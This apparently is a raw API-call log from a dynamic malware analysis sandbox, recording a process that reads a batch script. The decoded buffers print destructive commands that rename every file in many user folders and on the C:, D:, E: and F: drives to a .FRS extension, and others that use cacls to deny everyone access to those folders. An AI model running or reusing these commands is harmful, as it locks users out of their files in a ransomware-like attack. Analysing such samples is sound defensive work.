[0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0135.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0135.910] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.910] GetFileType (hFile=0x260) returned 0x1 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0135.910] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0135.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0135.910] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.910] GetFileType (hFile=0x260) returned 0x1 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0135.910] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0135.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0135.910] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.910] GetFileType (hFile=0x260) returned 0x1 [0135.910] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0135.911] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0135.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0135.911] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.911] GetFileType (hFile=0x260) returned 0x1 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0135.911] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0135.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0135.911] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.911] GetFileType (hFile=0x260) returned 0x1 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0135.911] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0135.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0135.911] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.911] GetFileType (hFile=0x260) returned 0x1 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0135.911] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0135.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0135.911] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.911] GetFileType (hFile=0x260) returned 0x1 [0135.911] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0135.911] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0135.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0135.912] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.912] GetFileType (hFile=0x260) returned 0x1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0135.912] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0135.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0135.912] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.912] GetFileType (hFile=0x260) returned 0x1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0135.912] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0135.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0135.912] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.912] GetFileType (hFile=0x260) returned 0x1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0135.912] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0135.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0135.912] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.912] GetFileType (hFile=0x260) returned 0x1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0135.912] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.912] SetFilePointer (in: hFile=0x260, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0135.913] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0135.913] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.913] GetFileType (hFile=0x260) returned 0x1 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0135.913] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0135.913] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0135.913] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.913] GetFileType (hFile=0x260) returned 0x1 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0135.913] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0135.913] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0135.913] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.913] GetFileType (hFile=0x260) returned 0x1 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0135.913] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0135.913] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0135.913] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.913] GetFileType (hFile=0x260) returned 0x1 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0135.913] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0135.913] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0135.913] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0135.913] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.913] GetFileType (hFile=0x260) returned 0x1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0135.914] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0135.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0135.914] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.914] GetFileType (hFile=0x260) returned 0x1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0135.914] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0135.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0135.914] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.914] GetFileType (hFile=0x260) returned 0x1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0135.914] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0135.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0135.914] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.914] GetFileType (hFile=0x260) returned 0x1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0135.914] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0135.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0135.914] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.914] GetFileType (hFile=0x260) returned 0x1 [0135.914] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0135.914] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0135.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0135.915] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.915] GetFileType (hFile=0x260) returned 0x1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0135.915] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0135.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0135.915] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.915] GetFileType (hFile=0x260) returned 0x1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0135.915] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0135.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0135.915] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.915] GetFileType (hFile=0x260) returned 0x1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0135.915] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0135.915] SetFilePointer (in: hFile=0x260, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0135.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0135.915] SetFilePointer (in: 